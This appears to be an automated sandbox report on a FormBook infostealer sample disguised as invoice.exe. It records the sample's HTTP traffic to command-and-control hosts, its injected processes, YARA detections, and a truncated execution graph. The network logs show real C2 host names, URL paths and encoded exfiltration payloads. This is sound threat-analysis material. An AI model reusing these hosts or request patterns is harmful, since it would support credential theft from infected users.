                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      27 | 192.168.2.4 | 50428 | 162.241.226.190 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:19.425220013 CEST | 10862 | OUT | POST /21tc/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.easyanalytics.site
                      Origin: http://www.easyanalytics.site
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.easyanalytics.site/21tc/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 58 39 2f 78 48 79 66 7a 59 35 5a 70 58 67 32 6b 2f 71 6b 69 33 64 6c 31 30 47 58 38 6e 5a 54 44 78 59 35 57 68 61 72 63 4c 39 5a 61 55 66 79 33 30 4a 47 70 6f 30 64 48 52 36 33 30 31 6f 6d 41 6f 55 61 6c 52 55 37 57 75 46 71 6c 46 6d 75 55 4b 47 7a 4c 79 66 7a 37 63 49 66 47 33 7a 64 2f 5a 32 48 54 72 49 2f 31 6f 31 63 33 76 62 71 54 4d 38 4e 44 33 34 4c 2f 59 44 4e 43 4a 63 6c 31 4e 62 38 67 63 36 70 78 6c 43 32 44 4b 73 30 4a 52 79 49 57 73 50 64 38 52 54 4f 57 7a 6f 67 49 70 31 2f 47 38 66 73 6f 47 4a 38 42 55 62 46 74 6b 76 57 6e 30 7a 45 30 2b 48 39 69 61 4c 6e 4e 4b 6c 72 61 38 38 57 43 46 50 66 4b 4a 32 4a 6f 67 70 42 37 39 59 79 71 52 52 72 64 51 6b 6a 2b 71 46 37 4e 52 37 4f 6f 6f 50 5a 66 4b 36 71 2b 34 39 4f 70 75 72 46 63 50 47 32 65 79 47 61 4d 45 70 6f 75 2f 36 49 55 5a 74 69 4c 79 6d 61 79 6d 2b 49 35 76 65 6c 54 79 69 47 58 35 47 4a 46 37 37 52 38 73 79 5a 72 58 66 6a 34 2f 62 50 79 45 46 61 6b 48 78 2f 51 78 33 55 63 37 [TRUNCATED]
                      Data Ascii: MtXH8dRH=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 [TRUNCATED]
                      Sep 13, 2024 12:29:20.079303980 CEST | 479 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:29:19 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      28 | 192.168.2.4 | 50429 | 162.241.226.190 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:22.274085999 CEST | 488 | OUT | GET /21tc/?MtXH8dRH=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.easyanalytics.site
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:29:22.922122002 CEST | 479 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:29:22 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      29 | 192.168.2.4 | 50430 | 91.215.85.23 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:29.077130079 CEST | 739 | OUT | POST /1i25/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.kalomor.top
                      Origin: http://www.kalomor.top
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.kalomor.top/1i25/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 73 74 41 76 66 30 46 54 56 6b 63 6f 74 68 5a 59 75 52 65 53 6d 69 61 6d 59 6e 49 58 47 43 71 69 78 72 6a 4a 4d 53 32 4d 74 68 47 42 76 31 30 38 31 51 43 43 57 65 4a 30 68 75 65 37 30 66 66 47 44 4a 58 6b 76 65 74 6a 66 31 73 65 4b 77 46 57 43 48 46 45 42 6e 72 57 6e 73 77 32 76 4b 73 68 37 76 4e 78 74 6f 56 43 5a 56 73 4c 6e 67 4b 34 30 66 67 68 6a 72 35 68 54 70 67 6c 67 39 50 4b 69 59 67 50 33 70 42 70 56 4f 77 2b 63 47 6b 75 33 46 48 57 6b 76 2f 72 6a 72 35 55 34 34 48 4f 63 31 65 67 67 7a 70 31 51 6f 43 79 33 6d 4b 6b 2b 50 2f 31 43 6c 34 35 54 30 6e 38 58 37 72 6f 45 51 3d 3d
                      Data Ascii: MtXH8dRH=stAvf0FTVkcothZYuReSmiamYnIXGCqixrjJMS2MthGBv1081QCCWeJ0hue70ffGDJXkvetjf1seKwFWCHFEBnrWnsw2vKsh7vNxtoVCZVsLngK40fghjr5hTpglg9PKiYgP3pBpVOw+cGku3FHWkv/rjr5U44HOc1eggzp1QoCy3mKk+P/1Cl45T0n8X7roEQ==
                      Sep 13, 2024 12:29:29.797451019 CEST | 309 | IN | HTTP/1.1 405 Not Allowed
                      Server: nginx/1.26.2
                      Date: Fri, 13 Sep 2024 10:29:29 GMT
                      Content-Type: text/html
                      Content-Length: 157
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      30 | 192.168.2.4 | 50431 | 91.215.85.23 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:31.621857882 CEST | 759 | OUT | POST /1i25/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.kalomor.top
                      Origin: http://www.kalomor.top
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.kalomor.top/1i25/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 73 74 41 76 66 30 46 54 56 6b 63 6f 73 42 70 59 69 53 32 53 68 43 61 68 53 48 49 58 66 79 71 6d 78 72 76 4a 4d 51 61 63 75 54 69 42 73 52 38 38 32 55 32 43 52 65 4a 30 34 65 65 2b 70 76 65 45 44 4a 72 73 76 65 42 6a 66 31 49 65 4b 31 35 57 43 51 78 48 44 33 72 44 79 63 77 34 72 4b 73 68 37 76 4e 78 74 6f 42 6b 5a 56 55 4c 6e 30 4f 34 30 36 4d 6d 39 37 35 67 53 70 67 6c 78 74 50 47 69 59 67 74 33 73 6b 45 56 4e 59 2b 63 48 55 75 30 55 48 5a 33 50 2f 74 73 4c 35 46 35 71 4b 47 57 47 58 62 6e 69 34 56 4e 72 62 66 79 67 62 2b 76 2b 65 69 51 6c 63 4b 4f 7a 75 49 61 34 57 68 66 53 63 73 48 6a 72 4b 55 54 36 73 75 52 69 7a 79 61 76 76 57 76 55 3d
                      Data Ascii: MtXH8dRH=stAvf0FTVkcosBpYiS2ShCahSHIXfyqmxrvJMQacuTiBsR882U2CReJ04ee+pveEDJrsveBjf1IeK15WCQxHD3rDycw4rKsh7vNxtoBkZVULn0O406Mm975gSpglxtPGiYgt3skEVNY+cHUu0UHZ3P/tsL5F5qKGWGXbni4VNrbfygb+v+eiQlcKOzuIa4WhfScsHjrKUT6suRizyavvWvU=
                      Sep 13, 2024 12:29:32.306646109 CEST | 309 | IN | HTTP/1.1 405 Not Allowed
                      Server: nginx/1.26.2
                      Date: Fri, 13 Sep 2024 10:29:32 GMT
                      Content-Type: text/html
                      Content-Length: 157
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      31 | 192.168.2.4 | 50432 | 91.215.85.23 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:34.260888100 CEST | 6180 | OUT | POST /1i25/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.kalomor.top
                      Origin: http://www.kalomor.top
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.kalomor.top/1i25/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Timestamp:Sep 13, 2024 12:29:34.937767982 CEST
                      Bytes transferred:309
                      Direction:IN
                      Data:HTTP/1.1 405 Not Allowed
                      Server: nginx/1.26.2
                      Date: Fri, 13 Sep 2024 10:29:34 GMT
                      Content-Type: text/html
                      Content-Length: 157
                      Connection: close
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                      Session ID:32
                      Source IP:192.168.2.4
                      Source Port:50433
                      Destination IP:91.215.85.238
                      Destination Port:80
                      PID:3120
                      Process:C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp:Sep 13, 2024 12:29:36.805512905 CEST
                      Bytes transferred:481
                      Direction:OUT
                      Data:GET /1i25/?MtXH8dRH=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.kalomor.top
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Timestamp:Sep 13, 2024 12:29:37.516345978 CEST
                      Bytes transferred:236
                      Direction:IN
                      Data:HTTP/1.1 200 OK
                      Server: nginx/1.26.2
                      Date: Fri, 13 Sep 2024 10:29:37 GMT
                      Content-Type: text/html
                      Content-Length: 11694
                      Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                      Connection: close
                      ETag: "66e176fd-2dae"
                      Accept-Ranges: bytes
                      Timestamp:Sep 13, 2024 12:29:37.516374111 CEST
                      Bytes transferred:1236
                      Direction:IN
                      Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co


                      Target ID:0
                      Start time:06:26:30
                      Start date:13/09/2024
                      Path:C:\Users\user\Desktop\invoice.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\invoice.exe"
                      Imagebase:0xf80000
                      File size:1'281'536 bytes
                      MD5 hash:8387395792CFC0ABB08DC4C23B8AD700
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:1
                      Start time:06:26:31
                      Start date:13/09/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\invoice.exe"
                      Imagebase:0xdf0000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      Target ID:2
                      Start time:06:26:38
                      Start date:13/09/2024
                      Path:C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe"
                      Imagebase:0xdc0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:3
                      Start time:06:26:41
                      Start date:13/09/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\at.exe"
                      Imagebase:0x700000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      Target ID:7
                      Start time:06:26:53
                      Start date:13/09/2024
                      Path:C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe"
                      Imagebase:0xdc0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      Target ID:8
                      Start time:06:27:15
                      Start date:13/09/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff6bf500000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true


                        Execution Graph

                        Execution Coverage:3.9%
                        Dynamic/Decrypted Code Coverage:1.3%
                        Signature Coverage:8.5%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:173
calls 97504->97505 97506 fbd37b 97505->97506 97508 f881a7 59 API calls 97506->97508 97509 f8387f 97507->97509 97510 fbd389 97508->97510 97736 f83ee2 97509->97736 97512 f83ee2 59 API calls 97510->97512 97515 fbd398 97512->97515 97520 f881a7 59 API calls 97515->97520 97516 f83899 97516->97490 97517 f838a3 97516->97517 97518 fa307d _W_store_winword 60 API calls 97517->97518 97519 f838ae 97518->97519 97519->97496 97521 f838b8 97519->97521 97522 fbd3ba 97520->97522 97523 fa307d _W_store_winword 60 API calls 97521->97523 97524 f83ee2 59 API calls 97522->97524 97525 f838c3 97523->97525 97526 fbd3c7 97524->97526 97525->97500 97527 f838cd 97525->97527 97526->97526 97528 fa307d _W_store_winword 60 API calls 97527->97528 97529 f838d8 97528->97529 97529->97515 97530 f83919 97529->97530 97532 f83ee2 59 API calls 97529->97532 97530->97515 97531 f83926 97530->97531 97752 f8942e 97531->97752 97534 f838fc 97532->97534 97536 f881a7 59 API calls 97534->97536 97537 f8390a 97536->97537 97539 f83ee2 59 API calls 97537->97539 97539->97530 97542 f893ea 59 API calls 97544 f83961 97542->97544 97543 f89040 60 API calls 97543->97544 97544->97542 97544->97543 97545 f83ee2 59 API calls 97544->97545 97546 f839a7 Mailbox 97544->97546 97545->97544 97546->97416 97548 f873f2 __write_nolock 97547->97548 97549 fbed7b _memset 97548->97549 97550 f8740b 97548->97550 97553 fbed97 GetOpenFileNameW 97549->97553 97551 f848ae 60 API calls 97550->97551 97552 f87414 97551->97552 98395 fa0911 97552->98395 97554 fbede6 97553->97554 97556 f87d2c 59 API calls 97554->97556 97558 fbedfb 97556->97558 97558->97558 97560 f87429 98413 f869ca 97560->98413 97564 f90a9a __write_nolock 97563->97564 98665 f86ee0 97564->98665 97566 f90a9f 97567 f83c26 97566->97567 98676 f912fe 89 API calls 97566->98676 97567->97425 97567->97433 97569 f90aac 97569->97567 98677 f94047 91 API calls Mailbox 97569->98677 97571 f90ab5 97571->97567 97572 f90ab9 GetFullPathNameW 97571->97572 97573 f87d2c 59 API calls 97572->97573 97574 f90ae5 
97573->97574 97575 f87d2c 59 API calls 97574->97575 97576 f90af2 97575->97576 97577 fc5004 _wcscat 97576->97577 97578 f87d2c 59 API calls 97576->97578 97578->97567 97580 fbd3cc 97579->97580 97581 f83ac2 LoadImageW RegisterClassExW 97579->97581 98681 f848fe LoadImageW EnumResourceNamesW 97580->98681 98680 f83041 7 API calls 97581->98680 97584 f83b46 97586 f839e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97584->97586 97585 fbd3d5 97586->97441 97588 f84406 _memset 97587->97588 98682 f84213 97588->98682 97592 f8448b 97593 f844c1 Shell_NotifyIconW 97592->97593 97594 f844a5 Shell_NotifyIconW 97592->97594 97595 f844b3 97593->97595 97594->97595 98686 f8410d 97595->98686 97597 f844ba 97597->97443 97599 fc501c 97598->97599 97613 f90b55 97598->97613 98855 fe9ed4 89 API calls 4 library calls 97599->98855 97601 f90e44 97602 f90e5a 97601->97602 98852 f911d0 10 API calls Mailbox 97601->98852 97602->97448 97604 f91044 97604->97602 97606 f91051 97604->97606 98853 f911f3 341 API calls Mailbox 97606->98853 97607 f90bab PeekMessageW 97644 f90b65 Mailbox 97607->97644 97609 f91058 LockWindowUpdate DestroyWindow GetMessageW 97609->97602 97612 f9108a 97609->97612 97611 fc51da Sleep 97611->97644 97614 